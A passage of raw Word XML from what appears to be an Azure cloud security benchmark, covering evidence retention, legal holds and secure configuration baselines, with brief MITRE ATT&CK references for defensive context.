        <w:t>Integration of lessons learned scenarios into tabletop exercises and incident response training programs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED2A687" w14:textId="181C62BB" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00D919B6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-7.2: Establish evidence retention and immutable storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0470FB49" w14:textId="2D9D8DCC" w:rsidR="00D919B6" w:rsidRDefault="00D919B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Immutable evidence storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402755A4" w14:textId="1B5B897F" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Azure Blob Storage immutable policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A133FA" w14:textId="4CD17CE6" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Time-based and legal hold policies preventing evidence modification or deletion during required retention periods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E477E23" w14:textId="3A499A6A" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Evidence Classification and Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A98C9E" w14:textId="3BEC9949" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Systematic classification of evidence types with appropriate retention periods based on regulatory requirements and legal considerations; leverage Microsoft Purview for data classification, sensitivity labeling, and retention/lifecycle policies to align evidence handling with organizational governance (Microsoft Purview).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E9443" w14:textId="19C25A86" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Chain of Custody Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB8AED" w14:textId="6FFB9884" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Automated chain of custody tracking with cryptographic hashing, digital signatures, and access logging for legal evidence requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64502420" w14:textId="0C871A63" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Cross-Region Evidence Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04247674" w14:textId="1025499B" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Geographic evidence replication for disaster recovery and jurisdictional requirements with encryption and access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7968C57B" w14:textId="5077941A" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t xml:space="preserve">Evidence </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D919B6">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D919B6">
        <w:t xml:space="preserve"> and retrieval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E0852" w14:textId="23F8C123" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:lastRenderedPageBreak/>
        <w:t>Systematic evidence indexing and search capabilities enabling rapid retrieval for legal proceedings and future incident analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B93BB1" w14:textId="77777777" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00D919B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5CCF41" w14:textId="77777777" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00D919B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6546B1" w14:textId="32FA25DD" w:rsidR="00D919B6" w:rsidRDefault="00D919B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Compliance and legal requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B165044" w14:textId="08C745BF" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Regulatory retention mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAE4556" w14:textId="3251C691" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Map evidence retention requirements across applicable regulations (e.g., HIPAA documentation retention 6 years; SOX relevant records often 7 years; PCI-DSS log retention minimum 1 year with 3 months immediately available). Note: GDPR does not prescribe a fixed multi-year evidence retention period—apply data minimization and purpose limitation principles; retain only as long as necessary for regulatory reporting, legal defense, and security operations, with documented justification. Sources: HIPAA, SOX, PCI-DSS, GDPR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE90338" w14:textId="71527259" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Legal Hold Automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43562E57" w14:textId="67EF1E0B" w:rsidR="00D919B6" w:rsidRDefault="00D919B6" w:rsidP="00E06AD0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="246"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D919B6">
        <w:t>Automated legal hold implementation triggered by litigation, regulatory investigation, or other legal requirements with indefinite retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7906756A" w14:textId="2267B38B" w:rsidR="005F684D" w:rsidRPr="00E06AD0" w:rsidRDefault="005F684D" w:rsidP="005F684D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc242449544"/>
      <w:r w:rsidRPr="00E06AD0">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Posture and Vulnerability Management</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="0FBD7AFA" w14:textId="6FAF6A34" w:rsidR="005F684D" w:rsidRDefault="005F684D" w:rsidP="005F684D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc242449545"/>
      <w:r w:rsidRPr="005F684D">
        <w:t>Establish secure baselines</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="7C5C03EA" w14:textId="3F5F308A" w:rsidR="005F684D" w:rsidRDefault="005F684D" w:rsidP="005F684D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc242449546"/>
      <w:r w:rsidRPr="005F684D">
        <w:t>PV-1: Define and establish secure configurations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="6DE26D39" w14:textId="607CC4F8" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7A3692" w14:textId="61DEC639" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Define security configuration baselines for different resource types in the cloud using configuration management tools to establish compliant environments by default. Leverage industry standards, vendor recommendations, and organizational requirements to create comprehensive baselines that can be automatically applied during resource deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45919FEB" w14:textId="42853442" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F684D">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2E7137E1" w14:textId="0087790B" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Configuration drift vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47329EA3" w14:textId="7A997474" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t xml:space="preserve">Resources deployed without security baselines introduce misconfigurations including open firewall rules, weak authentication settings, excessive </w:t>
      </w:r>
      <w:r w:rsidRPr="005F684D">
        <w:lastRenderedPageBreak/>
        <w:t>permissions, and disabled security logging-creating entry points for attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E404127" w14:textId="7EE59781" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Inconsistent security postures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF9C49D" w14:textId="7547437C" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t xml:space="preserve">Different teams deploying resources with varying security configurations create an unpredictable attack surface where some environments have strong </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F684D">
        <w:t>protections</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F684D">
        <w:t xml:space="preserve"> while others remain vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DEA795" w14:textId="55939DE8" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Compliance violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEE1066" w14:textId="314A4446" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Regulatory frameworks (PCI-DSS, HIPAA, SOC 2) mandate specific security configurations-absent baselines result in non-compliant deployments and audit failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCB9594" w14:textId="1E14BE58" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Default configuration exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9B1701" w14:textId="4662C3F7" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Cloud services often ship with default configurations optimized for functionality rather than security-unmodified defaults frequently contain security weaknesses that attackers routinely exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF1FDD4" w14:textId="03862288" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Manual configuration errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09227F71" w14:textId="3E4E9981" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Teams manually configuring security settings introduce human errors including typos, omitted settings, and misunderstood requirements that weaken overall security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A28A36" w14:textId="4D930D9A" w:rsidR="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>Scale amplification of weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79883246" w14:textId="6D879C25" w:rsidR="005F684D" w:rsidRPr="005F684D" w:rsidRDefault="005F684D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F684D">
        <w:t>In cloud environments, configuration weaknesses replicate across hundreds or thousands of resources through automation-a single baseline flaw impacts the entire environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B20535F" w14:textId="75E9A442" w:rsidR="00C47351" w:rsidRDefault="00241036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00241036">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4430178A" w14:textId="0818D3F5" w:rsidR="00241036" w:rsidRDefault="00241036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00241036">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCB9CFC" w14:textId="6C45A103" w:rsidR="0034087A" w:rsidRDefault="0034087A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0034087A">
        <w:t>exploit public-facing application (T1190) leveraging misconfigured services with default credentials or excessive network exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203CA4E1" w14:textId="0D7E1A22" w:rsidR="00241036" w:rsidRDefault="00241036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00241036">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365F019E" w14:textId="776334D1" w:rsidR="0034087A" w:rsidRDefault="0034087A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0034087A">
        <w:t>create account (T1136) exploiting weak account policies or administrative access controls in baseline configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4652C4DF" w14:textId="63979C8F" w:rsidR="00241036" w:rsidRDefault="00241036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00241036">
        <w:lastRenderedPageBreak/>
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12F9B0" w14:textId="33EE286B" w:rsidR="0034087A" w:rsidRDefault="0034087A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0034087A">
        <w:t>impair defenses (T1562) disabling security controls that were not properly configured or enforced in baseline deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7858F4EC" w14:textId="2973F9B4" w:rsidR="00241036" w:rsidRDefault="00241036">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00241036">
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA9BCD1" w14:textId="4564F971" w:rsidR="0034087A" w:rsidRDefault="0034087A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="430"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0034087A">
        <w:t>cloud infrastructure discovery (T1580) enumerating misconfigured resources to map attack paths and identify high-value targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7594958A" w14:textId="5E45D949" w:rsidR="00C47351" w:rsidRDefault="00241036" w:rsidP="00241036">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00241036">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>PV-1.1: Establish security configuration baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CEF254" w14:textId="2668483D" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="250"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Establish consistent security configurations through standardized baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB07A43" w14:textId="40C41043" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Define security configuration baselines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617040B8" w14:textId="5F4489A4" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Use Microsoft Cloud Security Benchmark and service-specific security recommendations to establish configuration standards for each Azure service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25843367" w14:textId="015154E8" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Implement Azure landing zones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46449AE9" w14:textId="38E8779E" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Use Azure landing zones to accelerate workload deployment with pre-configured security settings and governance controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AEA7D6" w14:textId="688A5191" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Use infrastructure-as-code templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E638B" w14:textId="529CF54B" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Codify and deploy consistent security configurations using Bicep templates and Template Specs for repeatable deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2D11D1" w14:textId="4CEAD7B3" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Reference architectural guidance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AAC7EB" w14:textId="63ACD783" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Follow Azure Well-Architected Framework security pillar for architectural configuration guidance and best practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF608A3" w14:textId="141267F5" w:rsidR="00A56F98" w:rsidRDefault="00A56F98" w:rsidP="00A56F98">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_Toc242449547"/>
      <w:r w:rsidRPr="00A56F98">
        <w:t>PV-3: Define and establish secure configurations for compute resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="112ACB0F" w14:textId="63ECFE36" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0301E4B9" w14:textId="6928C233" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56F98">
        <w:t xml:space="preserve">Define secure configuration baselines for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A56F98">
        <w:t>compute</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A56F98">
        <w:t xml:space="preserve"> resources including Virtual Machines (VMs) and containers. Use configuration management tools and pre-configured images to establish compliant compute environments by default, ensuring security hardening is applied consistently across all compute deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DFA1CC" w14:textId="77777777" w:rsidR="00A56F98" w:rsidRDefault="00A56F98" w:rsidP="00A56F98"/>
    <w:p w14:paraId="2AAE87DC" w14:textId="77777777" w:rsidR="00A56F98" w:rsidRDefault="00A56F98" w:rsidP="00A56F98"/>
    <w:p w14:paraId="68743B04" w14:textId="4294E399" w:rsidR="00A56F98" w:rsidRDefault="00A56F98">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
      </w:pPr>
